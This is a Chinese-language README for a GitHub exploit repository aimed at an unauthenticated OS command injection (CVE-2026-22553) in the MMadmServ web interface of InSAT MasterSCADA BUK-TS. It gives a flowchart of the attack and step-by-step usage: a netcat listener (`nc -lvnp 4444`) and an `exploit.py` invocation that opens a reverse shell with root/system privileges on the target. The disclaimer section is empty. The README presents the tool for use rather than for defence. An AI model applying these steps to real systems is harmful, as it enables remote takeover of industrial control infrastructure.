mbanyamer/CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

## 📝 描述 **InSAT MasterSCADA BUK-TS** 的 `MMadmServ` Web 接口中存在一个**未授权的 OS 命令注入**漏洞。此缺陷允许远程攻击者在无需任何身份验证的情况下实现**完整的远程代码执行 (RCE)**。 - **受影响产品**：InSAT MasterSCADA BUK-TS (所有版本) - **漏洞类型**：OS 命令注入 (CWE-78) - **严重程度**：严重 (CVSS v3.1 评分：9.8) - **漏洞利用作者**：[Mohammed Idrees Banyamer](https://github.com/mbanyamer) - **国家**：约旦 🇯🇴 ## 🛠️ 攻击方法示意图 ``` flowchart TD A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface] B -->|Unauthenticated| C[Vulnerable Parameter] C -->|OS Command Injection| D[Command Execution on Target Server] D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp ] style A fill:#ff4d4d,stroke:#fff style E fill:#4dff88,stroke:#fff ``` ## 🚀 用法 ``` python3 exploit.py --lhost --lport ``` ### 示例 ``` python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444 ``` ### 选项 | 选项 | 描述 | |------------|------------------------------------| | `target` | 目标 URL (例如 http://ip:port) | | `--lhost` | 你的 IP 地址 (用于反向 Shell) | | `--lport` | 你的监听端口 | ## 📌 使用说明 1. 在你的计算机上启动一个监听器： nc -lvnp 4444 2. 运行漏洞利用程序： python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444 3. 获取一个具有 **root/system 权限**的反向 Shell。 ## ⚠️ 免责声明 ## 📬 作者 **Mohammed Idrees Banyamer** - Instagram: [@banyamer_security](https://www.instagram.com/banyamer_security) - GitHub: [mbanyamer](https://github.com/mbanyamer) - 国家: 约旦 🇯🇴 **如果你觉得这个项目有用，请给本仓库点个 Star ⭐！**